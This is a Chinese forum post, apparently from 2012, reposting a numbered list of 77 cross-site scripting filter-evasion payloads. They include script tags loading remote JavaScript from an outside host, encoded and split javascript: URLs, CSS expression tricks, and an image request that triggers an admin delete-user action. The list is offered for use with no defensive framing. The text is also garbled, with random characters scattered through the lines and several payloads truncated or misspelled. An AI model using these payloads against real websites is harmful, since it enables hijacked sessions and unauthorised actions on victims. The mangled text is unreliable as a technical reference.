貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" d- K- y, i' W" y) U
: ^" }( t) T* Q+ @4 ? (1)普通的XSS JavaScript注入2 g! T* x2 a4 \) K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 r4 X/ h4 w8 S3 p( `7 T) _1 n9 W; Y# |( t5 S
(2)IMG标签XSS使用JavaScript命令
0 y' F# g: s6 V3 T: B9 N1 K <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 y$ ?7 M- {2 `
+ l3 O. ]1 {& V" v/ I) H (3)IMG标签无分号无引号
) {+ a5 p+ w h; [, @/ d <IMG SRC=javascript:alert(‘XSS’)>9 U2 H0 v5 l3 R4 N* s
! f: @& S6 P+ [% ` Y$ V Z/ T
(4)IMG标签大小写不敏感' H+ b4 Z0 u0 X8 N( w9 g
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: V, g) T# B: N; p6 E% M; v r1 K0 o
: S2 ^9 z3 n* b' A9 X' f4 a& w (5)HTML编码(必须有分号)
7 G6 y9 q6 e; i. P0 K: M <IMG SRC=javascript:alert(“XSS”)>
$ y" |! g6 O6 F- O- u u4 M4 S! n6 a/ q# ^+ Y6 ~0 m
(6)修正缺陷IMG标签* I# `4 F# N+ D# F0 b' h
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. \+ V. V4 Q! S) P. I
( z2 [1 ]' I" G; y' C7 P+ B, T (7)formCharCode标签(计算器)6 {7 S) U5 h0 {' r
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" D( }3 {7 Y* w4 h/ c
4 Z1 M( A6 Z' M7 b; i% s5 d (8)UTF-8的Unicode编码(计算器)7 ~8 S" }: k" d( Z& i4 l
<IMG SRC=jav..省略..S')>' k4 ?9 k2 ~# e5 n
% d% I) v/ Z" J- d (9)7位的UTF-8的Unicode编码是没有分号的(计算器); N3 Y( b/ ?5 r+ g; D- p( C
<IMG SRC=jav..省略..S')>, \2 H* m: I: }1 U" h
* ~# ` q- a# L( n- f/ @' R
(10)十六进制编码也是没有分号(计算器)9 m% ?, S" V1 w. w
<IMG SRC=java..省略..XSS')>
: s; ^. F5 v4 J+ L) F/ U* F Q7 o: ]& T: [ J6 f+ [$ Y
(11)嵌入式标签,将Javascript分开
6 w4 p7 M1 e' {5 o <IMG SRC=”jav ascript:alert(‘XSS’);”>& L* O" g3 c& M# B8 D% b
- q2 w& c9 ^; |0 R! I$ ? (12)嵌入式编码标签,将Javascript分开
" _+ J8 _8 A6 C7 Q' Q( ^0 D <IMG SRC=”jav ascript:alert(‘XSS’);”>8 B7 e! l! o3 `) ?, K. |
+ W4 U% m& c) M# F" Z' r6 g (13)嵌入式换行符 c0 p! L0 B% k) J2 h" A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) f: K$ Z. Q; ^: y. s1 I1 k% z) l! J5 U- S- ~
(14)嵌入式回车4 Q/ ], t8 F$ f) a) X
<IMG SRC=”jav ascript:alert(‘XSS’);”> a6 x( Z, K' X5 L3 x. N
, Z. f, }) F. V' Z; G (15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 ^" c' M- _1 @ <IMG SRC=”javascript:alert(‘XSS‘)”>
- ~0 I# k9 u' s* c
- Q; j) G( i F (16)解决限制字符(要求同页面)9 Q2 I+ C. z% n6 P8 F8 g- y4 `
<script>z=’document.’</script>3 _) D' ]6 |% c+ v. L6 n2 U, }
<script>z=z+’write(“‘</script>3 L) C( L% K, q; U
<script>z=z+’<script’</script>
; Y# ?9 b, ]+ G% N <script>z=z+’ src=ht’</script>2 Y \" U6 ]% T1 q$ M1 X
<script>z=z+’tp://ww’</script>% A) E: X2 q t! {- s
<script>z=z+’w.shell’</script>) W+ @2 z* S: `5 W$ v' F
<script>z=z+’.net/1.’</script>
; \: \! G: E: S6 a8 i T: n ~ <script>z=z+’js></sc’</script>; v3 W% W3 W9 r1 c ~7 v" _* ]4 Q$ n
<script>z=z+’ript>”)’</script>
) p6 [. R4 X2 s" l. H- L2 L <script>eval_r(z)</script>
# _( N) ]/ ^& d: a: n- A7 @# j1 W9 n; T8 b, @( `6 U+ N
(17)空字符
4 N4 ~. t8 N1 K, E7 O# U perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 l+ y8 e6 o" ^" q: X: z
2 H$ _3 K2 l! v" ^5 n# D4 z (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. Q" o Y) X: O% ^$ S9 r0 A perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( b! u. |# X ^1 B! i5 E
: z' q8 [( l8 E (19)Spaces和meta前的IMG标签
4 T3 P' `6 j6 R9 P( {7 t( g8 w7 I0 t0 I6 ^ <IMG SRC=” � javascript:alert(‘XSS’);”>9 X. l! ~5 ?% e8 B) E
% o0 P, @& j3 e7 j6 q; N( q) ]
(20)Non-alpha-non-digit XSS
& {' p$ @7 i- S# B <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 N! ~6 x# d& @% g" v
$ z1 H- }* Q) w' N; h) J (21)Non-alpha-non-digit XSS to 2+ e2 m$ w( Q9 G* }
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: g( V& t! g. J- \% A. o! ^$ x. x: i+ F8 h6 s1 Z- c% Y
(22)Non-alpha-non-digit XSS to 3
, O8 X9 C4 T3 q; t& y <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 e* _& \: p, e, _4 _- ?' K! v. d' ?! P! H5 G* s% I$ V/ T0 v
(23)双开括号
6 V) `. r6 E. S& A8 O8 d <<SCRIPT>alert(“XSS”);//<</SCRIPT>
: H7 }& |% c- ?4 b1 D. O+ K5 [
+ W' E D4 e% I6 G% @, \ (24)无结束脚本标记(仅火狐等浏览器)8 p- R( V* f! X$ B- k7 K2 H4 H
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: G& O. v# |/ f! P& k9 D7 ?; c
" X8 L8 V! w4 f+ r! E0 _% [ (25)无结束脚本标记2
) @! B6 V3 r% K9 {3 g9 K <SCRIPT SRC=//3w.org/XSS/xss.js>1 j4 n8 `" J6 s' B! @3 h
2 g" x! [2 Z- T6 A) c (26)半开的HTML/JavaScript XSS( V3 L7 N3 u. V- e7 L6 m
<IMG SRC=”javascript:alert(‘XSS’)”
6 b" A7 a* m* t' j( V% }4 I `" k
: I$ U. B+ d7 U3 y2 S (27)双开角括号: A ^. g$ x% O# }' N
<iframe src=http://3w.org/XSS.html <. p6 z, b) C, \+ v8 r6 I
; u: b; l8 h, g& i/ S# L
(28)无单引号 双引号 分号9 T I- _: y# h) r, N
<SCRIPT>a=/XSS/
' G+ c5 c0 f0 p% [+ j/ l3 L alert(a.source)</SCRIPT>
3 W+ I1 Q4 Z4 t& t% Z' o; l# U; ?+ M5 l! e
(29)换码过滤的JavaScript
% c# D7 K0 p& z$ {0 ^9 V* W6 V \”;alert(‘XSS’);//* U* ]2 D: W6 Z5 z2 I
. I! w4 i4 p% a7 G( `! v0 H# E$ L
(30)结束Title标签" s( A! A5 X+ h8 }( J0 u, Z: M8 Z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! p; n. G! x) d" D
; \" O8 i; A4 Z' P! A( F
(31)Input Image& G+ b4 T9 P! t5 P* W8 B
<INPUT SRC=”javascript:alert(‘XSS’);”> @* G6 x( C, K! {6 @9 b
% B. u/ ^& X5 k5 ^ (32)BODY Image
4 J4 c2 r6 a5 X <BODY BACKGROUND=”javascript:alert(‘XSS’)”> p0 j# E% ~7 h/ E! b- B/ i2 w" U" ^
& W6 Y- k) H5 l! D (33)BODY标签
; X' S3 o# `* x% y; X <BODY(‘XSS’)>
: N+ e2 X+ A* Y+ r# |0 j
4 o: e7 L6 h. }2 G& t# |3 s (34)IMG Dynsrc
6 s2 }8 x Y5 c7 V# V <IMG DYNSRC=”javascript:alert(‘XSS’)”>) s( F: j# M ~8 t* |! v
9 C# m9 K$ N2 v$ z (35)IMG Lowsrc$ s f2 f `1 B# m1 `. v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 W/ f. H% f7 _. T8 y( q
) N% R, h' }* o% j! K% s& K
(36)BGSOUND
# ^6 X. w' \& u- _# o <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- ^9 @! F# }/ x5 |7 R3 z" r9 Z0 U
(37)STYLE sheet
- g! m7 u! h( U% R( W <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 l7 D2 x* J* _# u3 L' E7 G, |
1 [4 f2 x2 s" [6 n! S- ~ (38)远程样式表* T+ d1 X5 A3 z5 R% M: m
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 w/ S/ O3 y4 m8 T) _) P
3 i0 {) j5 ]; R* r# k( {* F F: s6 U3 ] (39)List-style-image(列表式)
$ n' g, N$ b+ @1 `$ Z/ S <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# Z' s' b, R8 r* T/ L( t9 G1 W, i
) U1 P7 c+ f4 o* w N
(40)IMG VBscript
5 m3 U8 O! n% r. c& q; E <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: e4 \9 G9 D+ T, j$ Y6 b3 y0 j
- e0 s* z# R% i! C, t
(41)META链接url
! G- |1 L" O- a/ Q/ Z" k. U- P <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>0 W v1 s3 E" L6 ]+ a8 B) D/ [: A
8 h& x- v0 E8 `9 e6 V8 m2 U (42)Iframe
- q5 P. D3 ?' s; }# y5 Y <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 u7 P1 W' ~0 R: e# H/ Q: i; } C+ R' ^
(43)Frame
y t# a# ^3 H. H8 A* O <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. ^% V. V, A. T/ }$ Y# x* t# v3 Q0 _" E: [6 O& v3 [
(44)Table/ a$ @) g5 @! S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* X2 n" Q. ?8 p, F3 u' ^. b' }8 d$ [! m5 D* N9 Z7 O
(45)TD
: M. J, R& y' R& U <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>- Q, M' k4 L' C7 i
0 _4 R8 @. x9 t" `, ?; n (46)DIV background-image7 w6 r! Y. X$ |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' h3 Y! d0 P5 L+ H& @3 ^3 V
# T( F7 u k& U (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)' ^* D2 r& P; s* n7 p! F
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
$ H, f- W$ y! J& x" k3 R( R3 s9 c4 H) x8 d
(48)DIV expression
- J7 u3 B& t+ k u4 D <DIV STYLE=”width: expression_r(alert(‘XSS’));”>( j! W1 E l8 y- m
( H$ i; a0 C) C l+ A7 Z
(49)STYLE属性分拆表达7 K5 y8 c! g' h: C$ E
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># R( P- ~4 ]5 C/ d
0 j& [1 b: x0 D* K
(50)匿名STYLE(组成:开角号和一个字母开头)
" z8 A& T7 [3 F8 D* |" T7 G <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! L2 _+ _+ i d7 t
: @8 T4 F: w2 Q& b+ Z$ \& @
(51)STYLE background-image8 j3 `$ n) R9 I+ y: h; B
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>1 e" Q( k* m5 @# d1 Y8 t
4 y8 d' g5 L, H% p+ v
(52)IMG STYLE方式
3 v$ T4 C5 b/ f+ L( ]! T9 ~1 l exppression(alert(“XSS”))’>
" S* N: ?5 f3 e Y0 i" P9 q9 L6 O9 F6 V7 w. a+ W# _
(53)STYLE background
O( H* ]9 f: v4 y6 b <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 x2 Y' x, u0 X! A
9 U" ?- i$ s/ g' G( k7 A% F, R0 C* ~! @
(54)BASE0 u& q+ `( {0 w, B# }+ w& x5 m
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 u4 @' ~* \6 g* R0 M5 G) x' R. G% n
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
: O' F3 [4 O. ?" { ~. | <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 A+ U' n* [, {, L, i0 ~5 c1 S* E# H8 S1 C+ N- X Z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ f% J0 k/ e8 d a=”get”;# |$ r: F8 u/ I- s( J9 H7 V
b=”URL(\”";% b. T- O8 b8 O, i9 |& w+ G
c=”javascript:”;9 D+ q. S4 ~; {' W5 h7 u3 W* @
d=”alert(‘XSS’);\”)”;
: f" A' H6 T) T eval_r(a+b+c+d);
8 @! |+ K9 j! k7 R$ a& |2 s2 N8 _5 k7 N6 o7 v0 ]
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上# [; W5 y6 p+ \6 [
<HTML xmlns:xss># Y$ u4 H6 _) L4 O
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 ~6 O8 e: l' b) @2 l <xss:xss>XSS</xss:xss>' p& |. f5 o3 [/ R' [+ s2 C7 G
</HTML>0 v) [; Z' c, b' h
+ @$ e- h/ j% {1 Q; ~. D2 ?; S
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ `7 Q! ^ h% Y D1 b' d' b, w <SCRIPT SRC=””></SCRIPT>
0 \; \" j! @" U/ X9 `
3 k( s) e1 V0 _( `! O (59)IMG嵌入式命令,可执行任意命令
5 V3 g7 g% L! w* P/ M <IMG SRC=”http://www.XXX.com/a.php?a=b”>0 W& k. N5 Y' c
! p" [: h& ?+ v& D! ] P* j* } (60)IMG嵌入式命令(a.jpg在同服务器)/ h& o5 G# l& r
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 Q0 K$ d5 y9 |2 V. } @
: a# R8 d8 ~; M' N( T+ J (61)绕符号过滤6 H! s0 J" S( S# r/ h7 v
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 A, t* r a% q1 [& C* }0 B
: B9 g4 B: L. a' { (62)
& g3 p- ?; E8 x <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Y l& B8 M# B, y7 G h$ a" a! c' J7 ?, n4 S5 n& a% R! s
(63)% g! r# F- B' i% F/ `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 O; Y, Q3 J! r J" i g
# w% K6 U' f* b# i; Q& f E# N
(64)
K* t. D w U! B5 ]* z; ^/ d" w5 Y6 f6 e <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) C* j1 G0 K5 d
0 _9 J4 D: m2 O. w; |( f (65)
9 {, y$ w& u$ X$ q9 Q( G* o <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* p" y- B9 _! d0 Y+ }+ L3 `0 c
; A. `* v3 l& @- C9 E( n
(66)
: I" z c* j# u+ T# p3 t1 w <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% r# w9 B7 R+ E2 ^) s8 |! C+ ~6 f: P4 F' t* z* }0 j7 F5 V
(67)" Z6 ~5 Y5 @+ ~! L6 ~
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: l& s" R" g' d8 H
2 ~/ J( H) i! S0 @3 f6 Y8 N1 r (68)URL绕行
! k! E, B; a% }/ j; A' y* s. u, N <A HREF=”http://127.0.0.1/”>XSS</A>
8 O: ~7 f6 u, T, B
9 Y4 i& k5 w) p (69)URL编码
0 @* Y# o1 D4 a( ?/ N <A HREF=”http://3w.org”>XSS</A>
* p) q( u8 l" Z; }1 @# o
7 Y4 |! Y) H8 k0 I S (70)IP十进制
, A! N0 \9 z; x+ Q+ ?7 m4 W <A HREF=”http://3232235521″>XSS</A>
0 A9 u/ Y A0 H* z( x* p+ ~2 m8 v- E9 R7 ~
(71)IP十六进制! u2 t/ C H q" {8 I+ I
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* s4 x! V z/ w* q, G. I5 p' q( t, [2 I% g
(72)IP八进制
2 _& k! S4 J1 m* l3 t4 ? <A HREF=”http://0300.0250.0000.0001″>XSS</A>8 L( R7 S8 K5 i: Q- K5 J/ `7 ?! l
0 L+ G7 Z( V8 E6 T! z1 [0 m, E3 a t (73)混合编码
; |9 R% l) `; Y y <A HREF=”h
1 o3 I( x; S# b4 ]% ? tt p://6 6.000146.0×7.147/”">XSS</A>
/ J4 ]( L e) P' K, _2 l5 R* t$ i* w% s5 r
(74)节省[http:]* y; s7 d. o; U' Z5 j
<A HREF=”//www.google.com/”>XSS</A>
# B0 ~/ m) ^6 w2 b# C2 C/ w6 t" `! m& y& ^& b! l- E* A
(75)节省[www]
. M# A3 y% p, a, g* F <A HREF=”http://google.com/”>XSS</A>
2 ] @' s7 p# p) N
5 K6 g! B" I# v3 L (76)绝对点绝对DNS# K/ q5 T/ q4 y. V
<A HREF=”http://www.google.com./”>XSS</A>3 E$ [ r& X/ Q0 b! t
/ t/ M8 c2 [7 H! a( N (77)javascript链接" E2 \2 P% ^8 \+ n+ U/ G4 l
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对